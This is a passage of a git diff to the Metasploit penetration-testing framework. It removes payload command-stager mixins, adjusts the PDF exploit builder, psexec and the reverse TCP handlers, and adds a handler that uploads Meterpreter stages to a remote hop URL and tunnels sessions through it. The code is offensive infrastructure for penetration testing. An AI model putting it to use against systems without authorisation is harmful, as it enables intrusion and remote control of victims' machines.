-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-
-  def generate_cmdstager(opts = {}, pl = nil)
-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-end
-
-end
diff --git a/lib/msf/core/exploit/cmdstager_echo.rb b/lib/msf/core/exploit/cmdstager_echo.rb
deleted file mode 100644
index a4e45d3daa..0000000000
--- a/lib/msf/core/exploit/cmdstager_echo.rb
+++ /dev/null
@@ -1,34 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-####
-# Allows for staging cmd to arbitrary payloads through the CmdStagerEcho.
-#
-# This stager uses the echo's "-e" flag, that enable interpretation of
-# backslash escapes, to drop an ELF with the payload embedded to disk.
-# The "-e" flag is usually available on linux environments. This stager
-# has been found useful on restricted linux based embedded devices, and
-# should work on either:
-# * Systems with busy box's echo binary somewhere in $PATH.
-# * Systems with bash/zsh whose echo builtin supports -en flags.
-# * Systems with GNU coreutils echo which supports -en flags.
-#
-####
-
-module Exploit::CmdStagerEcho
-
-  include Msf::Exploit::CmdStager
-
-  # Initializes a CmdStagerEcho instance for the supplied payload
-  #
-  # @param exe [String] The payload embedded into an ELF
-  # @return [Rex::Exploitation::CmdStagerEcho] Stager instance
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerEcho.new(exe)
-  end
-end
-
-end
diff --git a/lib/msf/core/exploit/cmdstager_printf.rb b/lib/msf/core/exploit/cmdstager_printf.rb
deleted file mode 100644
index faad1f9d2a..0000000000
--- a/lib/msf/core/exploit/cmdstager_printf.rb
+++ /dev/null
@@ -1,27 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-####
-# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
-#
-# This stager uses a POSIX-conformant printf, that supports the interpretation
-# of octal escapes, to drop an ELF with the payload embedded to disk.
-####
-
-module Exploit::CmdStagerPrintf
-
-  include Msf::Exploit::CmdStager
-
-  # Initializes a CmdStagerPrintf instance for the supplied payload
-  #
-  # @param exe [String] The payload embedded into an ELF
-  # @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerPrintf.new(exe)
-  end
-end
-
-end
diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb
deleted file mode 100644
index d827f2ac05..0000000000
--- a/lib/msf/core/exploit/cmdstager_tftp.rb
+++ /dev/null
@@ -1,67 +0,0 @@
-# -*- coding: binary -*-
-
-require 'rex/text'
-require 'msf/core/exploit/tftp'
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStagerTFTP
-
-  include Msf::Exploit::CmdStager
-  include Msf::Exploit::TFTPServer
-
-  def initialize(info = {})
-    super
-
-    register_advanced_options(
-      [
-        OptString.new( 'TFTPHOST',  [ false, 'The address of the machine hosting the file via TFTP.' ]),
-        OptString.new( 'TFTPRSRC',  [ false, 'The filename of the TFTP-hosted resource.' ]),
-      ], self.class)
-  end
-
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerTFTP.new(exe)
-  end
-
-  def execute_cmdstager(opts = {})
-    tftphost = datastore['TFTPHOST']
-    tftphost ||= datastore['SRVHOST']
-    tftphost ||= datastore['LHOST']
-
-    @exe_tag = datastore['TFTPRSRC']
-    @exe_tag ||= Rex::Text.rand_text_alphanumeric(8)
-
-    opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })
-
-    super
-  end
-
-  #
-  # Start the service and register the file
-  #
-  def execute_cmdstager_begin(opts)
-    start_service(@exe_tag, @exe)
-  end
-
-  #
-  # Stop the service
-  #
-  def execute_cmdstager_end(opts)
-    stop_service
-  end
-
-  def payload_exe
-    return nil if not @stager_instance
-    @stager_instance.payload_exe
-  end
-
-end
-
-end
diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb
deleted file mode 100644
index 7e3d05bd71..0000000000
--- a/lib/msf/core/exploit/cmdstager_vbs.rb
+++ /dev/null
@@ -1,41 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStagerVBS
-
-  include Msf::Exploit::CmdStager
-
-  def initialize(info = {})
-    super
-
-    register_advanced_options(
-      [
-        OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]),
-      ], self.class)
-  end
-
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerVBS.new(exe)
-  end
-
-  def execute_cmdstager(opts = {})
-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-
-  def generate_cmdstager(opts = {}, pl = nil)
-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-end
-
-end
diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
deleted file mode 100644
index ddedf4343e..0000000000
--- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
+++ /dev/null
@@ -1,41 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStagerVBS::ADODB
-
-  include Msf::Exploit::CmdStager
-
-  def initialize(info = {})
-    super
-
-    register_advanced_options(
-      [
-        OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]),
-      ], self.class)
-  end
-
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerVBS.new(exe)
-  end
-
-  def execute_cmdstager(opts = {})
-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-
-  def generate_cmdstager(opts = {}, pl = nil)
-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-end
-
-end
diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
index 8ce6cf1a83..6a658243b0 100644
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -122,7 +122,7 @@ module Exploit::FileDropper
     end
 
     @dropped_files.each do |f|
-      print_warning("This exploit may require manual cleanup of: #{f}")
+      print_warning("This exploit may require manual cleanup of '#{f}' on the target")
     end
 
   end
diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index b32e4fa0c7..b6f8474cec 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -58,7 +58,7 @@ module Exploit::Remote::HttpClient
 
     register_evasion_options(
       [
-        OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-all', 'u-random']]),
+        OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-noslashes', 'hex-random', 'hex-all', 'u-normal', 'u-all', 'u-random']]),
         OptBool.new('HTTP::uri_full_url', [false, 'Use the full URL for all HTTP requests', false]),
         OptInt.new('HTTP::pad_method_uri_count', [false, 'How many whitespace characters to use between the method and uri', 1]),
         OptInt.new('HTTP::pad_uri_version_count', [false, 'How many whitespace characters to use between the uri and version', 1]),
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index 995d8d9ad2..9f2fdd9669 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -19,14 +19,6 @@ require 'msf/core/exploit/php_exe'
 
 # CmdStagers
 require 'msf/core/exploit/cmdstager'
-require 'msf/core/exploit/cmdstager_vbs'
-require 'msf/core/exploit/cmdstager_vbs_adodb'
-require 'msf/core/exploit/cmdstager_debug_write'
-require 'msf/core/exploit/cmdstager_debug_asm'
-require 'msf/core/exploit/cmdstager_tftp'
-require 'msf/core/exploit/cmdstager_bourne'
-require 'msf/core/exploit/cmdstager_echo'
-require 'msf/core/exploit/cmdstager_printf'
 
 # Protocol
 require 'msf/core/exploit/tcp'
@@ -92,7 +84,7 @@ require 'msf/core/exploit/java'
 # WBEM
 require 'msf/core/exploit/wbemexec'
 
-#WinRM
+# WinRM
 require 'msf/core/exploit/winrm'
 
 # WebApp
@@ -102,4 +94,8 @@ require 'msf/core/exploit/web'
 require 'msf/core/exploit/remote/firefox_privilege_escalation'
 require 'msf/core/exploit/remote/firefox_addon_generator'
 
+# Android
+require 'msf/core/exploit/android'
+
+# Browser Exploit Server
 require 'msf/core/exploit/remote/browser_exploit_server'
diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb
index ee7afe937c..1a1bcc8528 100644
--- a/lib/msf/core/exploit/pdf.rb
+++ b/lib/msf/core/exploit/pdf.rb
@@ -22,7 +22,7 @@ module Exploit::PDF
   )
 
   # We're assuming we'll only create one pdf at a time here.
-  @xref = []
+  @xref = {}
   @pdf = ''
   end
 
@@ -148,23 +148,18 @@ module Exploit::PDF
   #PDF building block functions
   ##
   def header(version = '1.5')
-    hdr = "%PDF-1.5" << eol
+    hdr = "%PDF-#{version}" << eol
     hdr << "%" << RandomNonASCIIString(4) << eol
     hdr
   end
 
   def add_object(num, data)
-    @xref << @pdf.length
+    @xref[num] = @pdf.length
     @pdf << ioDef(num)
     @pdf << data
     @pdf << endobj
   end
 
-  def range_rand(min,max)
-    until min < r=rand(max); end
-    return r
-  end
-
   def finish_pdf
     @xref_offset = @pdf.length
     @pdf << xref_table
@@ -174,12 +169,19 @@ module Exploit::PDF
   end
 
   def xref_table
+    id = @xref.keys.max+1
     ret = "xref" << eol
-    ret << "0 %d" % (@xref.length + 1) << eol
+    ret << "0 %d" % id << eol
     ret << "0000000000 65535 f" << eol
-    @xref.each do |index|
-      ret << "%010d 00000 n" % index << eol
-    end
+    ret << (1..@xref.keys.max).map do |index|
+      if @xref.has_key?(index)
+        offset = @xref[index]
+        "%010d 00000 n" % offset << eol
+      else
+        "0000000000 00000 f" << eol
+      end
+    end.join
+
     ret
   end
 
@@ -196,7 +198,11 @@ module Exploit::PDF
   end
 
   def eol
-    "\x0d\x0a"
+    @eol || "\x0d\x0a"
+  end
+
+  def eol=(new_eol)
+    @eol = new_eol
   end
 
   def endobj
@@ -267,7 +273,7 @@ module Exploit::PDF
   #Create PDF with Page implant
   ##
   def pdf_with_page_exploit(js,strFilter)
-    @xref = []
+    @xref = {}
     @pdf = ''
 
     @pdf << header
@@ -290,7 +296,7 @@ module Exploit::PDF
   # you try to merge the exploit PDF with an innocuous one
   ##
   def pdf_with_openaction_js(js,strFilter)
-    @xref = []
+    @xref = {}
     @pdf = ''
 
     @pdf << header
@@ -313,7 +319,7 @@ module Exploit::PDF
   #Create PDF with a malicious annotation
   ##
   def pdf_with_annot_js(js,strFilter)
-    @xref = []
+    @xref = {}
     @pdf = ''
 
     @pdf << header
@@ -332,5 +338,6 @@ module Exploit::PDF
 
     finish_pdf
   end
+
 end
 end
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index d1782616e1..6cd891aa84 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -439,7 +439,7 @@ module Msf
     #
     def on_request_uri(cli, request)
       case request.uri
-      when get_resource.chomp("/")
+      when '/', get_resource.chomp("/")
         #
         # This is the information gathering stage
         #
diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
index b03172c234..a927911220 100644
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@@ -9,7 +9,18 @@
 
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
-  
+
+  # Sends the +js+ code to the remote session, which executes it in Firefox's
+  # privileged javascript context
+  # @return [String] the results that were sent back. This can be achieved through
+  #   calling the "send" function, or by just returning the value in +js+
+  def js_exec(js, timeout=30)
+    print_status "Running the privileged javascript..."
+    token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
+    session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
+    session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
+  end
+
   # Puts the shellcode into memory, adds X flag, and calls it
   # The js function throws on error
   # @return [String] javascript code containing the execShellcode() javascript fn
diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index d3a6ccf13c..d4d3d1d88e 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -51,8 +51,11 @@ module Exploit::Remote::SMB::Psexec
   #   instead of all the ghetto "rescue ::Exception" madness
   # @param command [String] Should be a valid windows command
   # @param disconnect [Boolean] Disconnect afterwards
+  # @param service_description [String] Service Description
+  # @param service_name [String] Service Name
+  # @param display_name [Strnig] Display Name
   # @return [Boolean] Whether everything went well
-  def psexec(command, disconnect=true, service_description=nil)
+  def psexec(command, disconnect=true, service_description=nil, service_name=nil, display_name=nil)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
     vprint_status("#{peer} - Binding to #{handle} ...")
@@ -70,8 +73,8 @@ module Exploit::Remote::SMB::Psexec
       print_error("#{peer} - Error getting scm handle: #{e}")
       return false
     end
-    servicename = Rex::Text.rand_text_alpha(11)
-    displayname = Rex::Text.rand_text_alpha(16)
+    servicename = service_name || Rex::Text.rand_text_alpha(11)
+    displayname = display_name || Rex::Text.rand_text_alpha(16)
 
     svc_handle = nil
     svc_status = nil
diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb
index 302d26a956..120f8693e2 100644
--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -18,7 +18,7 @@ class Framework
 
   Major    = 4
   Minor    = 9
-  Point    = 2
+  Point    = 3
   Release  = "-dev"
 
   if(Point)
diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb
new file mode 100644
index 0000000000..96478245cc
--- /dev/null
+++ b/lib/msf/core/handler/reverse_hop_http.rb
@@ -0,0 +1,305 @@
+# -*- coding: binary -*-
+require 'rex/io/stream_abstraction'
+require 'rex/sync/ref'
+require 'msf/core/handler/reverse_http'
+require 'uri'
+
+module Msf
+module Handler
+
+###
+#
+# This handler implements the HTTP hop tunneling interface.
+# It acts like an HTTP server to the meterpreter packet dispatcher but
+# as an HTTP client to actually send and receive the data from the hop.
+#
+###
+module ReverseHopHttp
+
+  include Msf::Handler::ReverseHttp
+
+  #
+  # Magic bytes to know we are talking to a valid hop
+  #
+  MAGIC = 'TzGq'
+
+  # hop_handlers is  a class-level instance variable
+  class << self; attr_accessor :hop_handlers end
+  attr_accessor :monitor_thread # :nodoc:
+  attr_accessor :handlers # :nodoc:
+  attr_accessor :closed_handlers # :nodoc:
+  attr_accessor :mclient # :nodoc:
+  attr_accessor :current_url # :nodoc:
+  attr_accessor :control # :nodoc:
+  attr_accessor :refs # :nodoc:
+  attr_accessor :lock # :nodoc:
+
+  #
+  # Keeps track of what hops have active handlers
+  #
+  @hop_handlers = {}
+
+  #
+  # Returns the string representation of the handler type
+  #
+  def self.handler_type
+    return "reverse_hop_http"
+  end
+
+  #
+  # Returns the connection-described general handler type, in this case
+  # 'tunnel'.
+  #
+  def self.general_handler_type
+    "tunnel"
+  end
+
+  #
+  # Sets up a handler. Doesn't do much since it's all in start_handler.
+  #
+  def setup_handler
+    self.handlers = {}
+    self.closed_handlers = {}
+    self.lock = Mutex.new
+  end
+
+  #
+  # Starts the handler along with a monitoring thread to handle data transfer
+  #
+  def start_handler
+    # Our HTTP client and URL for talking to the hop
+    uri = URI(full_uri)
+    self.control = "#{uri.request_uri}control"
+    self.mclient = Rex::Proto::Http::Client.new(
+      uri.host,
+      uri.port,
+      {
+        'Msf'        => framework
+      }
+    )
+    @running = true # So we know we can stop it
+    # If someone is already monitoring this hop, bump the refcount instead of starting a new thread
+    if ReverseHopHttp.hop_handlers.has_key?(full_uri)
+      ReverseHopHttp.hop_handlers[full_uri].refs += 1
+      return
+    end
+
+    # Sometimes you just have to do everything yourself. 
+    # Declare ownership of this hop and spawn a thread to monitor it.
+    self.refs = 1
+    ReverseHopHttp.hop_handlers[full_uri] = self
+    self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri,
+        self) do |uri, hop_http|
+      hop_http.send_new_stage # send stage to hop
+      delay = 1 # poll delay
+      # Continue to loop as long as at least one handler or one session is depending on us
+      until hop_http.refs < 1 && hop_http.handlers.empty?
+        sleep delay
+        delay = delay + 1 if delay < 10 # slow down if we're not getting anything
+        crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control})
+        res = hop_http.mclient.send_recv(crequest) # send poll to the hop
+        next if res.nil?
+        if res.error
+          print_error(res.error)
+          next
+        end
+
+        # validate responses, handle each message down
+        received = res.body
+        until received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC
+
+          # good response
+          delay = 0 # we're talking, speed up
+          urlen = received.slice!(0,4).unpack('V')[0]
+          urlpath = received.slice!(0,urlen)
+          datalen = received.slice!(0,4).unpack('V')[0]
+
+          # do not want handlers to change while we dispatch this
+          hop_http.lock.lock
+          #received now starts with the binary contents of the message
+          if hop_http.handlers.include? urlpath
+            pack = Rex::Proto::Http::Packet.new
+            pack.body = received.slice!(0,datalen)
+            hop_http.current_url = urlpath
+            hop_http.handlers[urlpath].call(hop_http, pack)
+            hop_http.lock.unlock
+          elsif !closed_handlers.include? urlpath
+            hop_http.lock.unlock
+            #New session!
+            conn_id = urlpath.gsub("/","")
+            # Short-circuit the payload's handle_connection processing for create_session
+            # We are the dispatcher since we need to handle the comms to the hop
+            create_session(hop_http, {
+              :passive_dispatcher => self,
+              :conn_id            => conn_id,
+              :url                => uri.to_s + conn_id + "/\x00",
+              :expiration         => datastore['SessionExpirationTimeout'].to_i,
+              :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
+              :ssl                => false,
+            })
+            # send new stage to hop so next inbound session will get a unique ID.
+            hop_http.send_new_stage
+          else
+            hop_http.lock.unlock
+          end
+        end
+      end
+      hop_http.monitor_thread = nil #make sure we're out
+      ReverseHopHttp.hop_handlers.delete(full_uri)
+    end
+  end
+
+  #
+  # Stops the handler and monitoring thread
+  #
+  def stop_handler
+    # stop_handler is called like 3 times, don't decrement refcount unless we're still running
+    if @running
+      ReverseHopHttp.hop_handlers[full_uri].refs -= 1
+      @running = false
+    end
+  end
+
+  #
+  # Adds a resource. (handler for a session)
+  #
+  def add_resource(res, opts={})
+    self.handlers[res] = opts['Proc']
+    start_handler if monitor_thread.nil?
+  end
+
+  #
+  # Removes a resource.
+  #
+  def remove_resource(res)
+    lock.lock
+    handlers.delete(res)
+    closed_handlers[res] = true
+    lock.unlock
+  end
+
+  #
+  # Implemented for compatibility reasons, does nothing
+  #
+  def close_client(cli)
+  end
+
+  #
+  # Sends data to hop
+  #
+  def send_response(resp)
+    if not resp.body.empty?
+      crequest = mclient.request_raw(
+          'method' => 'POST',
+          'uri' => control,
+          'data' => resp.body,
+          'headers' => {'X-urlfrag' => current_url}
+      )
+      # if receiving POST data, hop does not send back data, so we can stop here
+      mclient.send_recv(crequest)
+    end
+  end
+
+  #
+  # Return the URI of the hop point.
+  #
+  def full_uri
+    uri = datastore['HOPURL']
+    return uri if uri.end_with?('/')
+    return "#{uri}/" if uri.end_with?('?')
+    "#{uri}?/"
+  end
+
+  #
+  # Returns a string representation of the local hop
+  #
+  def localinfo
+    "Hop client"
+  end
+
+  #
+  # Returns the URL of the remote hop end
+  #
+  def peerinfo
+    uri = URI(full_uri)
+    "#{uri.host}:#{uri.port}"
+  end
+
+  #
+  # Initializes the Hop HTTP tunneling handler.
+  #
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        OptString.new('HOPURL', [ true, "The full URL of the hop script, e.g. http://a.b/hop.php" ])
+      ], Msf::Handler::ReverseHopHttp)
+
+  end
+
+  #
+  # Generates and sends a stage up to the hop point to be ready for the next client
+  #
+  def send_new_stage
+    conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
+    url = full_uri + conn_id + "/\x00"
+
+    print_status("Preparing stage for next session #{conn_id}")
+    blob = stage_payload
+
+    # Replace the user agent string with our option
+    i = blob.index("METERPRETER_UA\x00")
+    if i
+      str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
+      blob[i, str.length] = str
+    end
+
+    # Replace the transport string first (TRANSPORT_SOCKET_SSL)
+    i = blob.index("METERPRETER_TRANSPORT_SSL")
+    if i
+      str = "METERPRETER_TRANSPORT_HTTP#{ssl? ? "S" : ""}\x00"
+      blob[i, str.length] = str
+    end
+
+    conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
+    i = blob.index("https://" + ("X" * 256))
+    if i
+      url = full_uri + conn_id + "/\x00"
+      blob[i, url.length] = url
+    end
+    print_status("Patched URL at offset #{i}...")
+
+    i = blob.index([0xb64be661].pack("V"))
+    if i
+      str = [ datastore['SessionExpirationTimeout'] ].pack("V")
+      blob[i, str.length] = str
+    end
+
+    i = blob.index([0xaf79257f].pack("V"))
+    if i
+      str = [ datastore['SessionCommunicationTimeout'] ].pack("V")
+      blob[i, str.length] = str
+    end
+
+    blob = encode_stage(blob)
+
+    #send up
+    crequest = mclient.request_raw(
+        'method' => 'POST',
+        'uri' => control,
+        'data' => blob,
+        'headers' => {'X-init' => 'true'}
+    )
+    res = mclient.send_recv(crequest)
+    print_status("Uploaded stage to hop #{full_uri}")
+    print_error(res.error) if !res.nil? && res.error
+
+    #return conn info
+    [conn_id, url]
+  end
+
+end
+
+end
+end
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index f40e9531af..9fbc2aa46d 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -55,11 +55,12 @@ module ReverseTcp
         OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
         OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
         OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
-        OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false])
+        OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
+        OptBool.new('ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false])
       ], Msf::Handler::ReverseTcp)
 
-
     self.handler_queue = ::Queue.new
+    self.conn_threads = []
   end
 
   #
@@ -124,6 +125,12 @@ module ReverseTcp
   #
   def cleanup_handler
     stop_handler
+
+    # Kill any remaining handle_connection threads that might
+    # be hanging around
+    conn_threads.each { |thr|
+      thr.kill rescue nil
+    }
   end
 
   #
@@ -154,7 +161,13 @@ module ReverseTcp
       while true
         client = self.handler_queue.pop
         begin
-          handle_connection(wrap_aes_socket(client))
+          if datastore['ReverseListenerThreaded']
+            self.conn_threads << framework.threads.spawn("ReverseTcpHandlerSession-#{local_port}-#{client.peerhost}", false, client) { | client_copy|
+              handle_connection(wrap_aes_socket(client_copy))
+            }
+          else
+            handle_connection(wrap_aes_socket(client))
+          end
         rescue ::Exception
           elog("Exception raised from handle_connection: #{$!.class}: #{$!}\n\n#{$@.join("\n")}")
         end
@@ -261,6 +274,7 @@ protected
   attr_accessor :listener_thread # :nodoc:
   attr_accessor :handler_thread # :nodoc:
   attr_accessor :handler_queue # :nodoc:
+  attr_accessor :conn_threads # :nodoc:
 end
 
 end
diff --git a/lib/msf/core/handler/reverse_tcp_double.rb b/lib/msf/core/handler/reverse_tcp_double.rb
index 9a46d74fd4..86ecd5df0e 100644
--- a/lib/msf/core/handler/reverse_tcp_double.rb
+++ b/lib/msf/core/handler/reverse_tcp_double.rb
@@ -83,7 +83,7 @@ module ReverseTcpDouble
     # Kill any remaining handle_connection threads that might
     # be hanging around
     conn_threads.each { |thr|
-      thr.kill
+      thr.kill rescue nil
     }
   end
 
@@ -105,9 +105,6 @@ module ReverseTcpDouble
 
           client_b = self.listener_sock.accept
           print_status("Accepted the second client connection...")
-
-          sock_inp, sock_out = detect_input_output(client_a, client_b)
-
         rescue
           wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
           return nil
@@ -119,9 +116,10 @@ module ReverseTcpDouble
         # Start a new thread and pass the client connection
         # as the input and output pipe.  Client's are expected
         # to implement the Stream interface.
-        conn_threads << framework.threads.spawn("ReverseTcpDoubleHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
+        conn_threads << framework.threads.spawn("ReverseTcpDoubleHandlerSession", false, client_a, client_b) { | client_a_copy, client_b_copy|
           begin
-            chan = TcpReverseDoubleSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
+            sock_inp, sock_out = detect_input_output(client_a_copy, client_b_copy)
+            chan = TcpReverseDoubleSessionChannel.new(framework, sock_inp, sock_out)
             handle_connection(chan.lsock)
           rescue
             elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
diff --git a/lib/msf/core/handler/reverse_tcp_double_ssl.rb b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
index 873e69c575..3a54619693 100644
--- a/lib/msf/core/handler/reverse_tcp_double_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
@@ -84,7 +84,7 @@ module ReverseTcpDoubleSSL
     # Kill any remaining handle_connection threads that might
     # be hanging around
     conn_threads.each { |thr|
-      thr.kill
+      thr.kill rescue nil
     }
   end
 
@@ -106,9 +106,6 @@ module ReverseTcpDoubleSSL
 
           client_b = self.listener_sock.accept
           print_status("Accepted the second client connection...")
-
-          sock_inp, sock_out = detect_input_output(client_a, client_b)
-
         rescue
           wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
           return nil
@@ -120,9 +117,10 @@ module ReverseTcpDoubleSSL
         # Start a new thread and pass the client connection
         # as the input and output pipe.  Client's are expected
         # to implement the Stream interface.
-        conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
+        conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, client_a, client_b) { | client_a_copy, client_b_copy|
           begin
-            chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
+            sock_inp, sock_out = detect_input_output(client_a_copy, client_b_copy)
+            chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp, sock_out)
             handle_connection(chan.lsock)
           rescue
             elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb
index 170f8099dd..740af69610 100644
--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -34,11 +34,11 @@ class Module
     end
 
     def fullname
-      return type + '/' + refname
+      type + '/' + refname
     end
 
     def shortname
-      return refname.split('/')[-1]
+      refname.split('/').last
     end
 
     #
@@ -84,7 +84,7 @@ class Module
   # Returns the class reference to the framework
   #
   def framework
-    return self.class.framework
+    self.class.framework
   end
 
   #
@@ -178,6 +178,7 @@ class Module
   #
 
   def print_prefix
+    ret = ''
     if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || (
       framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i
     )
@@ -189,10 +190,9 @@ class Module
         prefix << "[%04d] " % xn
       end
 
-      return prefix
-    else
-      return ''
+      ret = prefix
     end
+    ret
   end
 
   def print_status(msg='')
@@ -257,7 +257,7 @@ class Module
   # payloads/windows/shell/reverse_tcp
   #
   def fullname
-    return self.class.fullname
+    self.class.fullname
   end
 
   #
@@ -267,28 +267,28 @@ class Module
   # windows/shell/reverse_tcp
   #
   def refname
-    return self.class.refname
+    self.class.refname
   end
 
   #
   # Returns the module's rank.
   #
   def rank
-    return self.class.rank
+    self.class.rank
   end
 
   #
   # Returns the module's rank in string format.
   #
   def rank_to_s
-    return self.class.rank_to_s
+    self.class.rank_to_s
   end
 
   #
   # Returns the module's rank in display format.
   #
   def rank_to_h
-    return self.class.rank_to_h
+    self.class.rank_to_h
   end
 
   #
@@ -299,14 +299,14 @@ class Module
   # reverse_tcp
   #
   def shortname
-    return self.class.shortname
+    self.class.shortname
   end
 
   #
   # Returns the unduplicated class associated with this module.
   #
   def orig_cls
-    return self.class.orig_cls
+    self.class.orig_cls
   end
 
   #
@@ -366,30 +366,14 @@ class Module
   # Returns the address of the last target host (rough estimate)
   #
   def target_host
-    if(self.respond_to?('rhost'))
-      return rhost()
-    end
-
-    if(self.datastore['RHOST'])
-      return self.datastore['RHOST']
-    end
-
-    nil
+    self.respond_to?('rhost') ? rhost : self.datastore['RHOST']
   end
